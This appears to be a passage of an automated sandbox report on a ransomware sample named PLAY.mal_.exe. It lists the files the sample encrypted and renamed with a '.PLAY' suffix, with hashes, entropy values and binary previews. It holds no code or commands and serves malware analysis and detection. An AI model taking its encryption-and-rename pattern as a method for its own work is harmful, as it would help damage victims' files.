        C:\$Recycle.Bin\S-1-5-18\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1208
        Entropy (8bit):7.837980272830663
        Encrypted:false
        SSDEEP:24:ytvFL8vlRCQsoHKOy+9UjTYF6Z2gunlojV/q8R2V5J+biE:yFF+lRlD5WYPgul6/q8ib+biE
        MD5:84631327BF326193F59D5FBE4805151C
        SHA1:5533A6A3C291C38F6ABECB97DB8D0666673C6863
        SHA-256:2A6E444C7B9ED7F1AFF2732A71B7DAE64C1232C80EFC793AB5B1B5C6682F8B2B
        SHA-512:5BBA6D741C9B11904B79F43BDED9CE9EED77210586AAF9FF16B4F073439BD3DDCB4409CE0405C72324246AB870EC1969B55BF842C893B92A2F2E64AE8C256EAE
        Malicious:false
        Reputation:low
        Preview:...8.....g ......MP.|S..z.0...7.?...q.sK>..v..+B.!@d.y..en.8..|Lo...n..F.w... v.bP....~...*.}C@..+....#..%A{5.s=...8B:.,>B6.T..+wn^j\).4.....T..U.|.!.I>.......................... rkG.......A.{.c.4.A5.].\.}({A..D...!1..2..9u....#SO#....7..n(l..u.....d....V(v.......s..}>.....W.cU.2.#,I.."L^.7Q....@.....J.CX.......F.....(..{.L...+.H.6E.5u[...+q.8.....A.4/&...1....?n.^4.a.w~.}Z......2.....U..)....H.E(...m.3.wC...:..e(..#.w..?..2....KEFa.WR..7...&.....1.vG......[_.w.'9o....%.._..O..(....i..^...:U.a.2.......$.\aH..+.1.6.|6o#7q....?m..j..v,...&...w.fF.K...K.=..=`.?...aQ...!..8$.8..4#.z...H.GfAT5.e...l.}....~Z.....%..\......xs<.,.:....z...q.g.O..........N.7.....I.x..v......e..)kI6.`.d......M'$.w.......2.:c"3.}p....].I..L<..J..0]..0.w.e.{.Y._............l.1.?..<q..Qq.-...Y....W.6.V.a.T.\8b..+.>.....n./.i.3f~..%.....C(......2...b.)I(9...x.,..v1.t........'q.......uT\..@.Rg...i.th...X..vP..a...V..B.[~....^..+...mK..... ._.Q...{.?..(.W.....(.t....w^j.{.

        C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1208
        Entropy (8bit):7.809666047769951
        Encrypted:false
        SSDEEP:24:hZ59RlecgX3O4TTyO2OpdWxMrNQVHrBcZf4Gy8EKHB0rUZdhM6QC2:X59RlecW3Oqz4L9UK8t0rUZdhRQC2
        MD5:8EB657F0A4AB5F1983B7784363495549
        SHA1:8B4E9B3409BC6CB70AE9A17EC15068C375189088
        SHA-256:91885A6DE4E56089630D8B39124AD08FD918B43CC7653156620B2A3BD28DF3A9
        SHA-512:4D48D9FE83CB94741C4D08454BA3498E1B14AC5147CFB1527137BDDB390409BA5BDC4410DF2B212AEC64C6016E0F4A30F7A35791731C146E0356CC3DACB2CE93
        Malicious:false
        Reputation:low
        Preview:S~..-Y..L...K..'..M..t... .".m.Z..`.wHIj...7..hJ....s...GQ.3N...G.2V/5...[......m....B.t.~.:.......T....n....uU,......x.^^..|j...6....D...T..U.|.!.I>...........................L!K.....%d...?"....Ub.~A..:.<2....)a..,.j+M@.....Jq......o...E^aR./S1..w@;.(...4.m...H...Q...M.$.]..Tx..mb b.......G...V.G....$.:....,MEb\..[..4Q.`..{k).[.U..!.TMaW..B5].A..t..]r....$....9GJr~...Mu.HK.............. ..iq..."..P.Yh.W`NTB.>.w...#$..h....~..3...J.....i)dL..&I.F....8.......k9....bG..i.L...:I..Y+..4.~zP..*.(l...,`%.....{..3p@.L.]i[.M...b...zg...............e.-.......Y....An.tTPT.Rd.b.5...1.7......p.....[.1.=.s......\]>[_..E...W..}.Xp......./...|.L.[.L...pV..D..M.:..G9..Yl.9Q&.......5.A.d.qI+...c....:.b.{.......PO.D..cQPU'.rv....G.....w..UU\..Y.ZBz..u.E<~.OH..\[2.._U.x.W2........Jm.]..G.]..o..C.G..:Q....L.]..T.(..?.RH...E....c...U9..... 2......*P...1.n9...i.....@.....px.......i.j...GA. [..../....;.(..L.(.EB....Sk..i2..dC..e....DN...sv...p...X..FA..wq

        C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1208
        Entropy (8bit):7.809666047769951
        Encrypted:false
        SSDEEP:24:hZ59RlecgX3O4TTyO2OpdWxMrNQVHrBcZf4Gy8EKHB0rUZdhM6QC2:X59RlecW3Oqz4L9UK8t0rUZdhRQC2
        MD5:8EB657F0A4AB5F1983B7784363495549
        SHA1:8B4E9B3409BC6CB70AE9A17EC15068C375189088
        SHA-256:91885A6DE4E56089630D8B39124AD08FD918B43CC7653156620B2A3BD28DF3A9
        SHA-512:4D48D9FE83CB94741C4D08454BA3498E1B14AC5147CFB1527137BDDB390409BA5BDC4410DF2B212AEC64C6016E0F4A30F7A35791731C146E0356CC3DACB2CE93
        Malicious:false
        Reputation:low
        Preview:S~..-Y..L...K..'..M..t... .".m.Z..`.wHIj...7..hJ....s...GQ.3N...G.2V/5...[......m....B.t.~.:.......T....n....uU,......x.^^..|j...6....D...T..U.|.!.I>...........................L!K.....%d...?"....Ub.~A..:.<2....)a..,.j+M@.....Jq......o...E^aR./S1..w@;.(...4.m...H...Q...M.$.]..Tx..mb b.......G...V.G....$.:....,MEb\..[..4Q.`..{k).[.U..!.TMaW..B5].A..t..]r....$....9GJr~...Mu.HK.............. ..iq..."..P.Yh.W`NTB.>.w...#$..h....~..3...J.....i)dL..&I.F....8.......k9....bG..i.L...:I..Y+..4.~zP..*.(l...,`%.....{..3p@.L.]i[.M...b...zg...............e.-.......Y....An.tTPT.Rd.b.5...1.7......p.....[.1.=.s......\]>[_..E...W..}.Xp......./...|.L.[.L...pV..D..M.:..G9..Yl.9Q&.......5.A.d.qI+...c....:.b.{.......PO.D..cQPU'.rv....G.....w..UU\..Y.ZBz..u.E<~.OH..\[2.._U.x.W2........Jm.]..G.]..o..C.G..:Q....L.]..T.(..?.RH...E....c...U9..... 2......*P...1.n9...i.....@.....px.......i.j...GA. [..../....;.(..L.(.EB....Sk..i2..dC..e....DN...sv...p...X..FA..wq

        C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\$I2EW2MR.pdf

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1160
        Entropy (8bit):7.841449223394751
        Encrypted:false
        SSDEEP:24:Z+AaJV+2eXHtfsYqYELCB20brDA437oHCSOxfYx61jdgz:52emVYELo2QzsHCb5jdgz
        MD5:A6214B797D3A974B785BBA52911016CE
        SHA1:8B23D12AD599F12DB74145BE714A228960048808
        SHA-256:CA28EAE4A190E70D92246798E66DE34330915AB18E69E7301170D39A791A34F4
        SHA-512:C0493840189AB13B42144641F39675968E98A7EDBC113EF731B2E1C0ADD91B42CC7145FAE9B63B34446E7ABC58A54844CF1C947329F80CBA935542D926AACE76
        Malicious:false
        Reputation:low
        Preview:.*..p...f.\..jd|..}`d.|U..P..%Mwz#.<.L......px.9...IZ...!2h........._.^Z.*.....fxK.G.D&$.....T..U.|.!.I>..............................Z..Be....S.&...#............Y>.*...uT.k....W.>y.........v.8A./..Y....C...TD....cZ..C1.KY]...PN.<..fk...D.2W.0...7[...8K..a...9l..........;...+.......1G[\Y.m9.j..C.#.j......)..5:.g...a...ZW&.}s..,.\..SPV..d..K.'.#(....k....kR..mw...d..C.7..k.S.F.......F.nea}..s....3.b...pvY.p$.....u..8i.wh.P~ME..q.Z2..E...K[....I%..*.f.F.^._h..$.]B......l...jH.9.3...[.:@}.#..g....HH../..4.a..w.Fanm.`..#..{}..pE.g.U#......I..d.r./.D.B.zz.T.\N...:GEX..!..y.....G:.qoEa.'. ...........%:...}ZP.b....?~.3...NBM..HM.!....x.*......6;o...'KM..AP...vkidk....]~)....-...Z....V.g..`.z}s...........M..+.Y.......T...V..Z....h..i...x...*a2. 4OgY2..r1....;F.'A..?......J.....l.]$..JI....%hF8.w..9w..#(........7".W9.Q...n...c..P....n..[+U#g{@$..~|...:....c...zF..=.....7....o."Xi.vy...X.QZRZW..z..@..........-]BFO[. ....mx..\.,.z..].UT......Vp..:..z..'

        C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\$I2EW2MR.pdf.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1160
        Entropy (8bit):7.841449223394751
        Encrypted:false
        SSDEEP:24:Z+AaJV+2eXHtfsYqYELCB20brDA437oHCSOxfYx61jdgz:52emVYELo2QzsHCb5jdgz
        MD5:A6214B797D3A974B785BBA52911016CE
        SHA1:8B23D12AD599F12DB74145BE714A228960048808
        SHA-256:CA28EAE4A190E70D92246798E66DE34330915AB18E69E7301170D39A791A34F4
        SHA-512:C0493840189AB13B42144641F39675968E98A7EDBC113EF731B2E1C0ADD91B42CC7145FAE9B63B34446E7ABC58A54844CF1C947329F80CBA935542D926AACE76
        Malicious:false
        Reputation:low
        Preview:.*..p...f.\..jd|..}`d.|U..P..%Mwz#.<.L......px.9...IZ...!2h........._.^Z.*.....fxK.G.D&$.....T..U.|.!.I>..............................Z..Be....S.&...#............Y>.*...uT.k....W.>y.........v.8A./..Y....C...TD....cZ..C1.KY]...PN.<..fk...D.2W.0...7[...8K..a...9l..........;...+.......1G[\Y.m9.j..C.#.j......)..5:.g...a...ZW&.}s..,.\..SPV..d..K.'.#(....k....kR..mw...d..C.7..k.S.F.......F.nea}..s....3.b...pvY.p$.....u..8i.wh.P~ME..q.Z2..E...K[....I%..*.f.F.^._h..$.]B......l...jH.9.3...[.:@}.#..g....HH../..4.a..w.Fanm.`..#..{}..pE.g.U#......I..d.r./.D.B.zz.T.\N...:GEX..!..y.....G:.qoEa.'. ...........%:...}ZP.b....?~.3...NBM..HM.!....x.*......6;o...'KM..AP...vkidk....]~)....-...Z....V.g..`.z}s...........M..+.Y.......T...V..Z....h..i...x...*a2. 4OgY2..r1....;F.'A..?......J.....l.]$..JI....%hF8.w..9w..#(........7".W9.Q...n...c..P....n..[+U#g{@$..~|...:....c...zF..=.....7....o."Xi.vy...X.QZRZW..z..@..........-]BFO[. ....mx..\.,.z..].UT......Vp..:..z..'

        C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1208
        Entropy (8bit):7.823085810910608
        Encrypted:false
        SSDEEP:24:qvxV2R/M5qfPr9f8LRE395jO2N3/85JeH2B6URoCn4f2szAXiQnAUJC6pn6xiYGK:qv/2RrfPr9f8LSj0rC2FRoM7szAXisAL
        MD5:B7EAB634DC60AFCDCCDBE79322E03A4A
        SHA1:722A6868E3237D7F90A68EAA005992A1D64281D1
        SHA-256:B1B8D5A4604442EB93C3072EF237C811EBB70DDA896807214F45D818C1BCF63E
        SHA-512:F0E0914F6FBC8D8FD60A1AC11B0070FDCA102F52EDF72C2B7E97A2D609664A71348524E4C4B0273EF111BA343FB19476BE891711C80BFF238BE3A03B92070F1E
        Malicious:false
        Reputation:low
        Preview:A..Mk|Y<.b.*.,..A../....q.....,..gJ............~i...SI.r.....b.\.K((.:..C....UV.X..z.,.Lr...6..*..g......I..,.v...|......98..~....}ey).......T..U.|.!.I>...........................Y..y5.tH...\.4Y...W9...i.z..[*.#;..../S....&P.M.5,."ZJAU..9u.G`.d^.i..-..6...>.@...|r..1@...N9..T.N.N.?.y.P..D..O.y..H.`c.....J.yi....._..-.......5..4.Fu...84...u.Z.I)...1....F.."dZ.>fc.[.t......:n........Kk'.ZI2.c......b....r...x.1. J....JSP*.../+..e......-.3N.U._......N.-h...c\..|l.}....uDy.gZ..#Ah.`...*..B..>.*..WSQG...:.Ou....:L.-i.........^l.......(K.6....... ....4...5M.0...'.p.(a[...6{....\...{>%hl|.\....r.....rk..xJ0..Dcg.,B{.....*...j....Y2s.7w.9>4D.(3H.m.;M..Q..P."j..g.i.TF....z.3I!...X.....y..K.....7-FO.;..5.M..q.~.......v.\..V.../0nI.*,../.C.........B~.'...9Jz....o.z..*.........)~.....+.{q}.....:.^.x..i.w...H.K.rV....O.1D.X..8......{DS`_.A...2....C&`..s.}>...~.......v..x.s............*.....\]>.r.....Y.V....a...."....1r.[.y0.u..&..........

        C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1208
        Entropy (8bit):7.823085810910608
        Encrypted:false
        SSDEEP:24:qvxV2R/M5qfPr9f8LRE395jO2N3/85JeH2B6URoCn4f2szAXiQnAUJC6pn6xiYGK:qv/2RrfPr9f8LSj0rC2FRoM7szAXisAL
        MD5:B7EAB634DC60AFCDCCDBE79322E03A4A
        SHA1:722A6868E3237D7F90A68EAA005992A1D64281D1
        SHA-256:B1B8D5A4604442EB93C3072EF237C811EBB70DDA896807214F45D818C1BCF63E
        SHA-512:F0E0914F6FBC8D8FD60A1AC11B0070FDCA102F52EDF72C2B7E97A2D609664A71348524E4C4B0273EF111BA343FB19476BE891711C80BFF238BE3A03B92070F1E
        Malicious:false
        Reputation:low
        Preview:A..Mk|Y<.b.*.,..A../....q.....,..gJ............~i...SI.r.....b.\.K((.:..C....UV.X..z.,.Lr...6..*..g......I..,.v...|......98..~....}ey).......T..U.|.!.I>...........................Y..y5.tH...\.4Y...W9...i.z..[*.#;..../S....&P.M.5,."ZJAU..9u.G`.d^.i..-..6...>.@...|r..1@...N9..T.N.N.?.y.P..D..O.y..H.`c.....J.yi....._..-.......5..4.Fu...84...u.Z.I)...1....F.."dZ.>fc.[.t......:n........Kk'.ZI2.c......b....r...x.1. J....JSP*.../+..e......-.3N.U._......N.-h...c\..|l.}....uDy.gZ..#Ah.`...*..B..>.*..WSQG...:.Ou....:L.-i.........^l.......(K.6....... ....4...5M.0...'.p.(a[...6{....\...{>%hl|.\....r.....rk..xJ0..Dcg.,B{.....*...j....Y2s.7w.9>4D.(3H.m.;M..Q..P."j..g.i.TF....z.3I!...X.....y..K.....7-FO.;..5.M..q.~.......v.\..V.../0nI.*,../.C.........B~.'...9Jz....o.z..*.........)~.....+.{q}.....:.^.x..i.w...H.K.rV....O.1D.X..8......{DS`_.A...2....C&`..s.}>...~.......v..x.s............*.....\]>.r.....Y.V....a...."....1r.[.y0.u..&..........

        C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1208
        Entropy (8bit):7.8273588178012785
        Encrypted:false
        SSDEEP:24:2itGME2sduGq2zKFTB6rMf6+eTPZegp0LOtd9N3+bkd5PR:mMgFwTB6rMf6+eTgQltdv3ckzPR
        MD5:72BA844E1B3C9CF8D157742715BD8FEB
        SHA1:9BA5BA3CA83AA583B7CAE1882C04014C0CC37190
        SHA-256:5C9934247BB3386B6C87AD2B062E4230E69794AE9505AF15ADC581ED0E3A4C76
        SHA-512:FEBB5B1A8EA89E14D90D9FFCFDB3C57F05C941BBF9ECAB5A4CC7AC61F99B0E189294ECEC3F2BE362986F82AFB23DFC780CA7358141881C6E73DF645BC64AA381
        Malicious:false
        Reputation:low
        Preview:.7..|0R30u=\...,T......<_^.:-.......*'....T.L..._...-.E0...?.$d.....T..2.@.w..9I[.....q..,X.....$b..gp......3...L..&...f7......e<..4e:...H...T..U.|.!.I>..........................0...J......&...$6..?..v..L.....M..Z..K.V.."^+.u...........L4......V.....O+ec:.........G;+H..P.....`.."/..T.p9....2.^I...F.wHxL.L.."D.6.k..!u...K.%<....:s.&.....T@.....7*D.Q...O)o8.jj.M.fzh..Q..ci.IZx.@.. ...hQ...J.Z"P....... ..Q...qw..U@C.kK..M...Y.....W....$.....V....x..u.6O.,..5...uA.S...!.Vrck... .;.Z.....!K<.`...m...J'.f.......q.?..H.....OA......Bg....q'm..T\.Px.jz..l..R....B.g..lc.j.<.} .._2+..^.. (E}.]r..@.......7..,+JA.l.VH.4w...K.........9^.....Te../e.h.+.........!A.......se.5".E5..+_.r.'m[Y..f.......I.y.[..F.=F...5..uv.Jn..F.h...).0/../.L.....:.fi..L<......"....)......._,q..&......)Qq...S}.../Q.......c.h..{.I3.d.B;.^....s{.n".'.|..d.R.`.M.F....tR..W.p....r...........F`..J.........q.J...X..L7Kx.`^Y..........h......'>L*....O.!.n..&.~.j~[...D.n....t.....a.F......YZ..*G..

        C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1208
        Entropy (8bit):7.8273588178012785
        Encrypted:false
        SSDEEP:24:2itGME2sduGq2zKFTB6rMf6+eTPZegp0LOtd9N3+bkd5PR:mMgFwTB6rMf6+eTgQltdv3ckzPR
        MD5:72BA844E1B3C9CF8D157742715BD8FEB
        SHA1:9BA5BA3CA83AA583B7CAE1882C04014C0CC37190
        SHA-256:5C9934247BB3386B6C87AD2B062E4230E69794AE9505AF15ADC581ED0E3A4C76
        SHA-512:FEBB5B1A8EA89E14D90D9FFCFDB3C57F05C941BBF9ECAB5A4CC7AC61F99B0E189294ECEC3F2BE362986F82AFB23DFC780CA7358141881C6E73DF645BC64AA381
        Malicious:false
        Reputation:low
        Preview:.7..|0R30u=\...,T......<_^.:-.......*'....T.L..._...-.E0...?.$d.....T..2.@.w..9I[.....q..,X.....$b..gp......3...L..&...f7......e<..4e:...H...T..U.|.!.I>..........................0...J......&...$6..?..v..L.....M..Z..K.V.."^+.u...........L4......V.....O+ec:.........G;+H..P.....`.."/..T.p9....2.^I...F.wHxL.L.."D.6.k..!u...K.%<....:s.&.....T@.....7*D.Q...O)o8.jj.M.fzh..Q..ci.IZx.@.. ...hQ...J.Z"P....... ..Q...qw..U@C.kK..M...Y.....W....$.....V....x..u.6O.,..5...uA.S...!.Vrck... .;.Z.....!K<.`...m...J'.f.......q.?..H.....OA......Bg....q'm..T\.Px.jz..l..R....B.g..lc.j.<.} .._2+..^.. (E}.]r..@.......7..,+JA.l.VH.4w...K.........9^.....Te../e.h.+.........!A.......se.5".E5..+_.r.'m[Y..f.......I.y.[..F.=F...5..uv.Jn..F.h...).0/../.L.....:.fi..L<......"....)......._,q..&......)Qq...S}.../Q.......c.h..{.I3.d.B;.^....s{.n".'.|..d.R.`.M.F....tR..W.p....r...........F`..J.........q.J...X..L7Kx.`^Y..........h......'>L*....O.!.n..&.~.j~[...D.n....t.....a.F......YZ..*G..

        C:\Documents and Settings\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901220034.msp.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):244417608
        Entropy (8bit):6.925652381378844
        Encrypted:false
        SSDEEP:6291456:FWCpELQzJo3S/buKi8FpgpeNcOf77ntTVU5EAb2XO9R:FWCpELQzWKi8FpgpeNcOf77ntTVU5EAL
        MD5:076F673285A4A8285093979F3C81C3AA
        SHA1:860B78F1ACAC5D8B3749AA059346D6ED21456B74
        SHA-256:2C49C4F446D0641459666711FA45C72E6DF9F4CF609D37455665EDFE3ECF696C
        SHA-512:8C4EB3276F9632AC269B7EFCCD60FEC1A4667284377DF07CDB0CDA1A43B97C3337490A8A1965D1FD6E52C38B3105EB412BE8667C556E3AE5AE8915AF68DE4BC7
        Malicious:false
        Preview:..J....:.DWB.(,.s.\...0.<......VJ..&N..qS...<..)...tR.>]..Z...x..=/.b..R..V.H...I.l[Ey.b.....e.2.B.|.Ui...Pj...|..J.}.f....}c.........=....O....+[..n..2..k.*.h.2....g..=}.`.[...i.c.-....>....@e.5.....j.c..K....b.U..MF..v...c.d.....o.|...J\..!.g....W...lr.J..#.l...% .U.L.Gu..S....6.q...!P.oas.f...s>.}\S.'d...b.6.B.e..H^..=.Y...n.....W'..@.l.{....C..F..O)(.`..q.*...G..7....IT.Lk.U..cR.|..T^6=R.ho%.......J...!..;|):...'..}83.H.c..R.Cx=...=.yW....Q`.K..I....Ldn.M<.[.s.j..D..LOe.a....@...........$.z.9.ZixyZ3G4lf!...'Cui...hCQ....`N.k...{..w..&.T.Aj2k.*e.[....4.\..W.H..?.}...i..?.X..M..y.;..c...&..xW.7..%r..Z.b.......7..+......p...U.$.>>.".t..$...[.b..B ..TM.]...CT.tkp......^i..)..Y.%...Y.G..,8...{\...D0..Z..v.......t.8...........I..kn..J...G..R...V&,.......k.v.Z[.`..x........N..x...p..k..w.;.y%z.z..p....S....._..S..#.T..u.'.o.5W.Z..{..82.9..//_ehG.\.:.J..@.u...{.>.o^&.t.......2...w..oB..!.-........w9..r..d..+6......o.`z..2(.......#..3!

        C:\Documents and Settings\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):175115128
        Entropy (8bit):6.857424497239928
        Encrypted:false
        SSDEEP:3145728:iIFJHdDdl9HCH6eRwZ+zU5IZ+zix/5bg5hS:hdXXHCHJeZ+zU5IZ+zix/G5hS
        MD5:A9EF01DE624FE631C70FF3207019C0D9
        SHA1:4C9882315D7A51190BE925658212E5FB86979FE9
        SHA-256:595B49F4E3853052987A117CD99C94F985EEBAACB8510346BE5FEFA2CCCD3F7A
        SHA-512:84DDB92FBFEEC786D5EF31E4A68B41E9F179D663EC92AD9AE13791212B2044733216151988A5F5BD184427D61B0C2A6AD71E5E21BA1F99DF7ABF55FE8E0E3F6F
        Malicious:false
        Preview:*.+V.vV`.1lx..]..,].;...,...........+.5\...........T.....+.~9:.~.D.. .C.M%.14t.w....u...'AWj..t9.%v..S..\......;.}.Ed....I.d|G...=.oD a.[........8.....s.K..J.O..H.&o^.x.*..'.^o.I..B.....V..(.G..............c......(.cq..q.]4di..S#.A...i.R...?d.]te......N..F..5.5..>.KO.{...sUA...=`@..B...n..m.4.K.B2.ZUMCi.....\.d.%9G....}..........QO$..U.P...d|.Nx.xq.H.....bX.c.j..H.....>...q...R\j.cJ..N.gE..MW...&qa...v5....[.Zl7....a..@../..G..#'...j....%..1<...n.....B.....e..V.+]%.`cu...C..~..#x...0.|.N.2...C*....)...)..w..LF.>EF.|.|.~k..V|.;....G........P.x.`b.......WBQ.....G.KC..'..a.d..q...N.G.Q'..M....M...+...."...A.....".}...T?...)*...G..*n..{'.fz..."....[/.eT.7.h.^..K...a&...]|..LA...(.9Jb..j..%.(j....9........N..(......0.eII.)..3|&..r.nq...y2$T.^...S...{...m^....<^.;#.Y.?v......j.+Z.......*....MIy..?.2...~...5.u.5.....SSj.b...g....6.|...............+]2U.x...!..9.X.9f..,.(..H..\.V..U+.K<j.Y(.....t.....+-.h..f.l..UD.l.hff....9D.>...r..../...K....b...

        C:\Documents and Settings\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1688
        Entropy (8bit):7.874048756998993
        Encrypted:false
        SSDEEP:
        MD5:915654CD8D47EEE09B7D231EF16291D7
        SHA1:742A72E54596829216E770F101F53596270A4614
        SHA-256:BEE6EF660A83C088F845B881753F5FB56EE1311422E9D3F1B69B993FC6B7D9A4
        SHA-512:894ABAB7EDB098F30C66FC5062A8B6D147646051AFB04FE53B900417F788270A17C4D1F7FB5278AD639FE2D73097FD364FD00A6A7D4E99DA0690ECE77D5F5630
        Malicious:false
        Preview:LS;'..B!@.........-wv........@ M.D....*1....`}..JI.D....!......Q.T....=%.x.j..."...(s.X....1.......`..rk.....m)..?...|>y..w..L.E..}...........m.k.e....5..J^6c...2.......C..sH.'O.0...)..T...`Y..F.....%n.L.5h..q8(.zN...x.........$..+....xX.>.dU...l...bL..m`'~.....pg..q..D....N.......{.....L....'.6.j......x.. ..X._..... .......t.r...B..O...c.zf.y....A.$~Q.P.......%!..U.~.N.......7....KS~....k.......`n.H.5HC....."....]. _..i.]W4.N..F.v.;..f_...rO..#{:M7...b....d..z....fh%.t.{.e.).X.t........Y........!.9..f.."W....k..U5.K1.....8...."/......8..\.5.sL...lX..=._.....*..0....$..=..N.qX|....T..U.|.!.I>...........................[.M........@.O+........S.&'...k..6l..v.#g",..A..?+..3......{ls.........%[...@+......7.....g......0.Et%.!..w-...k"...u....w=........ ...>~.i..i;........k.:\.. sb.x{.OF.mr/..[.P.K6..].y?.._..u.WB...J=... .....y..z...a.cq....$z.9{x.DBQ!v..E.|{.!8.(..N3..@.. /...(,P@.u.X."@@..p%..0.#...~@;..7yf......>.}J...........r....e.&..

        C:\Documents and Settings\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1288
        Entropy (8bit):7.838401423848566
        Encrypted:false
        SSDEEP:
        MD5:253E08C25096908364CB69770D526524
        SHA1:E58E0096A69ED717A35AA436F27BD6D4FE8FD0B8
        SHA-256:904F63C08479B2F3C52379666B8B5C5507B48CEA2FC4B9646F3C2F8D40BFBDDF
        SHA-512:8B8C0B9C68A9B871C685097F843C5EA8FE7B02C3ED8EEC12542C88F9A459468FE6992B805C128FDDD1F60EB2B20DDA046D2794D184A68C9C4FE320AE41C1E8CB
        Malicious:false
        Preview:G.eYs,`5.YNK..9.....6\zZ.N.C)......T10..$`_..N..F..9.....z,..|.../..T.s{....Qu6.6ik:..... u..#...>r.X..%.#.Qq.. ..B.]} ....$..Kt...1t*...JH{....i.....c.$...3+.).nf...!n........e.?'...p..g..9.^db.a.Cr...Z...I.......T..U.|.!.I>.............................~T..K..=pA...XSR.....$....l`y.#....}..."e...P#;T4.Ay3B..*n0:..Ms4j...e...l.s.1@......F.t.......?.3.D|.J.+2Na.h.7...q.f...3.%.....!..l..x..i.S0..'.'.BZVt.K$.|W..'.L.|.vl.z.... N..F'.1.t..d./.m..=n..}.........}.yE.$.V.?..h.3....s6|V>..q}.HKc.B^.UN.r.rP.}.{.Z.$.....0q..1..@..1..@].H.EU.C'...+\.N.E.=..z.P.t.Rd.a...{...4dXI.b..X=....)0....c.N....A.J...Q...A.BrSM....?.I[.....H.......0....js)...:.......@`..N.....%....l...5Q..(.^........j..<}U.ie.x!....pH._..>.)?.).@B....N...B.$V.!...Oq...&..W {h"..........a.s.9][c.Zd...r8}j...e.. .m~.r....6..y1...y46..~D....-Q;....\.c...Q..)...3UE.2..."..z.....6./P1xW/.r..T8p.;..8H...O'.....V(1.C}lo......@...t.}[..?f,FN......[..R.(..<X....D....`X...z.6.......".h`.....

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.DATABASECOMPARE.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1496
        Entropy (8bit):7.86804391972879
        Encrypted:false
        SSDEEP:
        MD5:70E6DD27549154712E6E85B324484324
        SHA1:F436FB0617F7213C0D563EAF9A32D45E09C8B67E
        SHA-256:1DE9E05156C7F45DCB2D00C4DBCCEFF19A5C26441BFFDED332C77116184E35D3
        SHA-512:36AEBCD0FBA9F6B79A29EB2242871698CE6F6BEF1A4131725356919BAFACF039C5C835A610C8D42419FD25FA5083DD600BEB5BD3399224595C4AA7470E094259
        Malicious:false
        Preview:.SM......n#.d..j.k}..^..(....RV...K7......%.....<.~.bStj.4U.1.$.9..p.y..8......I..S1I.p....0..M rWC..Q#.{N.0...@.....F.......q.7...U...3.vp..c4.Bv.K.-.n..,......R..uY.D.fO6..H}#..)Eu.D(.1a.4.*....F..D[)...R{.:E...........H.v.r(S_....;.....`.t.?NMC?....%.o.....i.|Q/...E..|.....|g.y.....*..%.<9..8.:.....;..`.:..M..8 ...Q.......|...........:.^z....;......z0...W.|.Z..9.Z.8.>..).es...f..q+>..p}r$c....h...t...VL.W.3...T..U.|.!.I>..........................q.(H.(Y..(...I..B...s..Fpi....kW...").....;.../...t.q..p......{..P..f.. .....8.k!.%I...L]X....q........&.....k&...a)l(...!.&.).........T..........Z...{..9.k....$...un.U)..D.......nu...E.rZ(u.:!....Obi-.^...6..@|........|..T..^.h.I....<0{....V...j*...G[n..6.bc..=.......$.c.Q..................F$H.|.......[F7..A9..XX?......}.=.......1..=b..l.m.."?.2..H?....]87.(.e0...)..4..o(."..i..n.U.......M5.-t.>.Jp.f.#..SpDn..6H!`...<....s.r*Z@.s.S..x.w.pQ.:|.q..r.g.<..h./.e.`.....Y. ]J.....U..w.K.a.|S:b~.).

